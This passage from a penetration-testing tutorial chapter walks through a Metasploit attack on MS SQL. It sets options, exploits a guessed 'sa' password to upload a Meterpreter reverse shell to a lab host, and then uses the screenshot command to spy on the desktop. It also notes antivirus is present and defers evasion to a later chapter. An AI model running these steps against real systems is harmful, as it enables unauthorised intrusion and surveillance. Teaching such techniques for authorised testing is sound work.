80
Chapter 6
msf exploit(mssql_payload) >
set LPORT 443
LPORT => 443
msf exploit(mssql_payload) >
set RHOST 192.168.33.130
RHOST => 192.168.33.130
msf exploit(mssql_payload) >
set PASSWORD password123
PASSWORD => password123
msf exploit(mssql_payload) >
exploit
[*] Started reverse handler on 192.168.33.129:443
[*] Command Stager progress - 2.78% done (1494/53679 bytes)
[*] Command Stager progress - 5.57% done (2988/53679 bytes)
[*] Command Stager progress - 8.35% done (4482/53679 bytes)
. . . SNIP . . .
[*] Command Stager progress - 97.32% done (52239/53679 bytes)
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1699)
meterpreter >
After selecting the
mssql_payload
module and setting our payload to
meterpreter
at , all we need to do is set the standard options before starting
our Meterpreter session. We’ve succeeded in opening a Meterpreter session
at on the target machine.
To recap, in the attack described here, we used the
mssql_ping
module
to guess the MS SQL
sa
password, which we discovered is
password123
. We
then leveraged the
mssql_payload
module to communicate with MS SQL and
upload a Meterpreter shell through MS SQL, and the shell was presented to
us, thereby completely compromising the system. Once the Meterpreter shell
is presented, we know that the exploit was successful and we can continue
with post exploitation on this system.
Basic Meterpreter Commands
Having successfully compromised the target and gained a Meterpreter console
on the system, we can glean more information with some basic Meterpreter
commands. Use the
help
command at any point for more information on
how to use Meterpreter.
Capturing a Screenshot
Meterpreter’s
screenshot
command will export an image of the active user’s
desktop and save it to the
/opt/metasploit3/msf3/
directory, as shown in Figure 6-1.
meterpreter >
screenshot
Screenshot saved to: /opt/metasploit3/msf3/yVHXaZar.jpeg
Desktop screen captures offer a great way to learn about a target system.
For example, in Figure 6-1, we can see that McAfee antivirus software is
installed and running, which means we’ll need to be cautious about what we
upload to the system. (Chapter 7 discusses antivirus evasion in more detail.)